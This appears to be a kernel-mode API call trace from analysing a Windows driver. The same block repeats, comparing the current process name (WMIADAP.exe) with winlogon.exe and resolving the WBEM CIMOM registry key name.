| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
